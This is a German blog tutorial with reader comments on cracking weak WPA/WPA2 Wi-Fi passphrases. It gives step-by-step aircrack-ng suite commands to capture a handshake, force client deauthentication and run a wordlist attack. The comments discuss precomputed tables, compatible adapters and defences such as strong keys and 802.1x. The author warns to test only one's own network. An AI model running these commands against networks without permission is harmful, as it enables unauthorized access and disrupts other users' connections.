[Tutorial] WPA gesichertes WLAN ‘hacken’

// April 3rd, 2008 // Blog / Website, IT, Links, Security, Termine, Tutorials

Aufbauen auf meinem Artikel 'WEP gesichertes WLAN knacken (Fragmentation Attack)' möchte ich nun mit diesem Beitrag aufzeigen, dass auch die WPA bzw. WPA2 Verschlüsselung ihre 'Schwachstellen' hat.

Im Gegensatz zu WEP hat WPA / WPA2 selbst keine 'Schwachstelle'. Zwar kann beim Herstellen einer Clientverbindung der Authentifizierungs-Handshake mitgelesen und aufgezeichnet werden, jedoch bringt dieser dem Angreifer herzlich wenig, wenn ein vernünftiges Passwort verwendet wird. Der Angriff auf diesen Handshake und das darin enthaltene Passwort kann bisher nur mittels Wortlisten-Attacken und Bruteforce erfolgen. Bei einem starken Passwort kann dies mehrere Jahre oder sogar Jahrzehnte dauern.

Ein Tipp noch vorweg:
Am bequemsten ist es, wenn man die benötigten Informationen wie 'BSSID', 'ESSID', 'Client-MAC', etc. in Variablen speichert. So kann man schnell und einfach auf die Inhalte zugreifen, ohne diese jedes mal neu tippen oder per Copy&Paste einfügen zu müssen.

Informationen (die gleichen wie beim WEP-Crack)

BSSID des AP: 00:12:BF:46:68:BD

ESSID des AP: N3ur0m4nc3r

Kanal des AP: 01

MAC des WLAN-Adapters: 00:C0:CA:19:FF:86

WLAN-Adapter muss Packetinjection und

Monitor Mode unterstützen.

Als Betriebssytem habe ich Backtrack 3 verwendet, welches ich unter VMware installiert habe.

Anleitung

  1. Starten des benötigten Interface (in diesem Falle wlan0)
    ifconfig wlan0 up
  2. Aktivieren des Monitor-Modus für den Kanal 1 (auf welchem unser AP arbeitet)
    airmon-ng start wlan0 1
  3. Nun wird airodump-ng mit den entsprechenden Parametern gestartet:
    -c 1 für Kanal 1
    -w Dateiname für die zu speichernde Datei
    --bssid Mac-Adresse des APs
    wlan0 das Interface
    airodump-ng -c 1 -w neuro-wpa2 --bssid 00:12:BF:46:68:BD wlan0
  4. Damit wir auch einen Handshake mitlesen können, muss sich ein Client anmelden während der Datenverkehr von airodump-ng aufgezeichnet wird.
    Um sämtliche Clients, welche zur Zeit mit dem AP verbunden sind zu trennen (und sie so zum Wiederverbinden zu animieren) kann mit aireplay-ng ein DeAuth erzwungen werden.
    -0 4 --> es werden 4 DeAuth-Pakete versandt
    -a --> Mac-Adresse des AP
    -c --> Mac-Adresse des Client
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82
    wpa deauth thumb [Tutorial] WPA gesichertes WLAN hacken
  5. Sobald der Handshake aufgezeichnet wurde, kann aircrack-ng auf das Passwort angesetzt werden. Dieses kann, wie schon oben geschrieben, mittels Passwortliste oder Bruteforce-Angriff erfolgen.
    wpa handshake thumb [Tutorial] WPA gesichertes WLAN hacken
    -a 2 --> Angriff auf WPA / WPA2
    -b --> Mac-Adresse des AP
    -e --> essid des AP
    -w --> Pfad bzw. Dateiname der Wortlisten (können auch mehrere sein)
    aircrack-ng -a 2 -b 00:12:BF:46:68:BD -e N3ur0m4nc3r -w <passwordfile> *.cap

    wpa aircrack thumb [Tutorial] WPA gesichertes WLAN hacken

Ich möchte jedoch nochmal darauf hin weisen, dass man in fremden Netzwerk nichts zu suchen hat, sofern man nicht die Erlaubnis vom Eigentümer erhalten hat.

Am besten testet man dies alles nur in seinem privaten Netzwerk.

32 Responses to “[Tutorial] WPA gesichertes WLAN ‘hacken’”

  1. [...] WEP-Crack-Turorial nun auch die Anleitung zum Angeifen schwacher WPA-Passphrases veröffentlicht, und zwar hier. Die Methode ist einfach: Man de-authentifiziert alle Clients, die an dem AP angemeldet sind, und [...]

  2. Julian Kessel says:

    Sehr schön geschriebenes und beschriebenes tut vielen Dank für ihre Mühe :D
    weiter so !

  3. moebb says:

    absolut unzureichendes tutorial... verwendung von john mit stdout nich erklärt..und was noch wichtiger ist: erklärung zu precompiled hashtables fehlt völlig... wäre aber für nen grundlagentut erforderlich, weil wpa cracking doch ohne diese keinen sinn macht;-)

    wenn man tuts schreibt, sollte man wenigstens die seite zum tool mal gelesen haben--->www.aircrack-ng.org

  4. Torsten Feld says:

    @moebb:
    1. john the ripper sollte bei diesem Tutorial auch nicht Inhalt sein. Hier stand im Vordergrund aufzuzeigen, dass auch WPA seine Schwachstellen hat. John wäre aber mal ein eigenes Tutorial wert.

    2. Precompiled Hashtables sind beim WPA 'knacken' so überflüssig wie ein Kropf. Da bei WPA die ESSID mit in den Schlüssel einfließt, müsste man für jede ESSID eigene Hashtables entwerfen, was sowohl vom Speicherplatz als auch aus zeitlicher Sicht keinen Sinn macht.

    3. Da meine Tutorials direkt auf der Seite des Tools verlnkt wird, können Sie so schlecht ja nicht sein. ;)

    4. Vielleicht solltest Dich vorher selbst mal informieren und nicht so feige sein und eine gefakete E-Mail-Adresse angeben. :)

  5. moebb says:

    hey torsten...

    erstmal hab ich weder Deinen namen noch ein link zu Dir auf der aircrack-ng seite gefunden.. vielleicht sagst Du mal genauer wo das sein soll.

    dann hast Du natürlich recht..hashtables kann man net gebrauchen..weiß garnich warum ich das so genannt habe, wollte ich nicht! aber eben sowas in der art:-D gibt es..aus jeweiliger essid und ner angepasten passwortliste ne sql liste machen und so dazugehörige pairwise master keys erstellen und "storen"...das erhöht die prüfungsgeschwindigkeit ungemein! auch wenn es selbstverständlich immer noch net wirklich praktikabel ist, geht alles doch in die richtige richtung. für eine gruppe von leuten ist aber damit schon mehr an nem wpa netz machbar...

    ich werde mal gucken, ob Du andere interessante tuts online hast. und ja mach doch mal ein deutsches tut zu john!.. ick glaube sowas gibts in diesem zusammenhang net ausführlich

  6. Torsten Feld says:

    Der zweite und dritte Link hier.
    Auch aus PMK und und essid würde eine entsprechende Liste keinen großen Sinn machen. Da man eh für nahezu jedes WPA-WLAN eine neue Liste erstellen müsste, kann man auch gleich Bruteforcen oder Passwortlisten einsetzen. Abgesehen davon, dass das Ganze sowieso illegal ist und man die ganze Geschichte nur mal für zu Hause zum Testen der eigenen Sicherheit testen sollte.

    Sofern ich mal wieder mehr Zeit habe, was momentan nicht der Fall ist, werde ich mich evtl. mal daran setzen.

  7. Max says:

    Es ist uebrigends nicht moeglich auf die WPA Handshakes per Aircrack mit Bruteforce los zugehen. Nur per Wordlist und das ist schwierig. Ich erachte WPA als ziemlich sicher.

  8. pastacode says:

    >Auch aus PMK und und essid würde eine entsprechende Liste >keinen großen Sinn machen. Da man eh für nahezu jedes >WPA-WLAN eine neue Liste erstellen müsste, kann man auch >gleich Bruteforcen oder Passwortlisten einsetzen.

    Entsprechende Listen (genauer: Rainbowtables) gibt es bereits im Netz zu finden. Hier hat man einfach die 1000 beliebtesten ESSID's alla Default, NETGEAR... etc... mit jeweils 1 Millionen Passwörtern aus einer Wortliste kombiniert. Sinn macht das ganze deswegen schon...

  9. Torsten Feld says:

    WPA ist so gut wie geschichte, auch ohne Rainbowtables. Mit der Software von Elcomsoft und dicken NVIDIA-GPUs sind die meisten Passwörter jetzt schon kein Problem mehr. Außerdem soll die Tage eine Schwachstelle in TKIP veröffentlicht werden, die es ermöglich den Schlüssel innerhalb von ca. 15 Minuten zu knacken (http://www.gulli.com/news/wlan-sicherheit-wpa-verschl-2008-11-07/).

  10. unbekannt says:

    wenn wpa nicht mehr sicher ist, was soll man da dann noch als "Otto-Normal-Benutzer" machen?

  11. TheBlueSmile says:

    Du könntest als sicheres Wlan so gestalten

    Wpa2 Shared Key (der key wechselt immer , im betrieb)

    Dazu machst du ein eigenes Subnetzwerk.

    Dhcp dienst aus

    und eine hand voll ip addressen die nur zugriff auf den Ap / Internet haben am besten kombiniert mit Ip & mac

    achja deine Keys bitte so wählen das groß,klein,sonderzeichen und zahlen drin sind.

    Sorry für Rechtschreibung ^^

    mfg Tbs

    ps: ein Lehrer hat das von uns und wir durften es versuchen zu knacken richtig schweres ding (wir habens nicht geschaft)

  12. Timo says:

    Hallo
    habe eine edimax wirelass lan pci adapter IEEE 802.11g Turbo Mode wo finde ich den Treiber für den Monior mode?

    kann mir jemand helfen??

    Danke

  13. Timo says:

    Danke für die schnelle antwort. habe einen Chipsatz von Ralink Turbo Wireless Lan Card #2.
    Habe überall gesucht, jedoch nichts gefunden...

    Gruß Timo

  14. Timo says:

    ja da hast du recht^^also auf dem link war ich auch schon und nichts gefunden :-( ......
    gibt es eine kosten günstige card die den monitor mode unterstüzt?

    Frohe Weihnachten

  15. Timo says:

    Erst mal auch ein danke schön für deine schnellen antworten, find ich echt gut..
    kann man wlan auch mit einenm anderen programm hacken indem ich nicht den monitor mode bauch??

    • Torsten Feld says:

      WLAN-Adapter gibt es sicher einige, die günstig sind und sich in den Monitor-Mode schalten lassen. Kommt aber eben darauf an, was Du suchst (USB, PCI, PCMCIA). Der 111er von Netgear kann auch Monitor-Mode, meine ich. Müsstest Du aber einfach mal nachschauen.

      Du brauchst nicht zwingend aircrack, aber den Monitor-Mode benötigst Du auf jeden Fall.

      Dir auch frohe Weihnachten.

  16. dani says:

    Tolles Tutorial!

    Irgendwo war glaube ich ein kleiner Fehler... bei Schritt 4:
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82
    Hier muss noch das WLAN-Device angegeben werden, also in diesem Fall:
    aireplay-ng -0 4 -a 00:12:BF:46:68:BD -c 00:15:00:02:C8:82 wlan0

    Noch eine Frage... mein WLAN-Netzwerk verwendet WPA2-PSK (AES). Ich kenne den Key (hexadezimal).
    Natürlich würde das nur mit Bruteforce gehen (oder?). Deshalb wollte ich einfach den Key in die mit aircrack-ng mitgelieferte wordlist einfügen. Aber wie wandle ich den WPA2-PSK in ASCII um?
    Außerdem hab ich da zwei Keys... einen 10 stelligen hexadezimalen Key (steht in der Routerconfig) und einen ziemlich langen Key der im Ubuntu-NetworkManager gespeichert ist. Was ist denn jetzt der Key??

    Sorry, wenn ich mit meinen Fragen nerve, aber ich interessiere mich sehr für solche Sachen ^^

    Lg

  17. paranoiax says:

    eine frage:
    wenn die essid aus 2 getrennten Wörtern besteht (zB: WLAN BLAKEKS), wie gebe ich diese dann ein? soll ich sie in anführungszeichen setzen? zB. so= "WLAN BLAKEKS"

  18. drzero says:

    Hallo,

    soweit klappt das ja recht gut nur bekomme ich mit dem C54RU USb Stick von Conceptronic keinen handshake zustande hat da vllt jmd ähnlich erfahrungen bzw ne ahnung ob das an fehlender packer injection fähigkeit liegen kann?

    mfg

  19. drzero says:

    Hallo, und thx für die schnelle aw

    Ralink rt2x00

    wäre der chipsatz bzw treiber

    mfg

  20. pastacode says:

    Die momentan sicherste Methode ist wohl Enterprise WPA. Das wird an meiner und auch vielen anderen Uni's vewendet, stellt aber einen gewissen Aufwand da, wenn man es denn auch zuhause verwenden möchte. (Wikipedia - 802.1x)

    Vielleicht haben ja bereits einige Consumer-Router diesen Standart - verglichen mit WPA2 ist das ein großer Sicherheitsgewinn.

    • Torsten Feld says:

      Ist auf jeden Fall sehr sicher, da aber wohl die wenigsten einen 802.1x fähigen Router zu Hause haben und wohl erst recht keinen eigenständigen RADIUS-Server (z.B. Windows IAS oder Linux), ist WPA2 mit entsprechend langem und kryptischem Passwort schon sicher genug. :)

  21. spinnt ihr says:

    sach ma habt ihr knall? ich meld das den bulln

    • Torsten says:

      Die Frage ist: "Hast Du einen?" - Hier wird lediglich aufgezeigt, wie einfach es ist, WEP bzw. WPA mit schwachen Passwörtern zu knacken, damit auch der Otto-Normalverbraucher sich mit der Sicherheit seines WLANs auseinandersetzt und es entsprechend sichert. Wenn Du Dich vor Polizei und Staatsanwalt blamieren möchtest, geh halt hin. ;)

Leave a Reply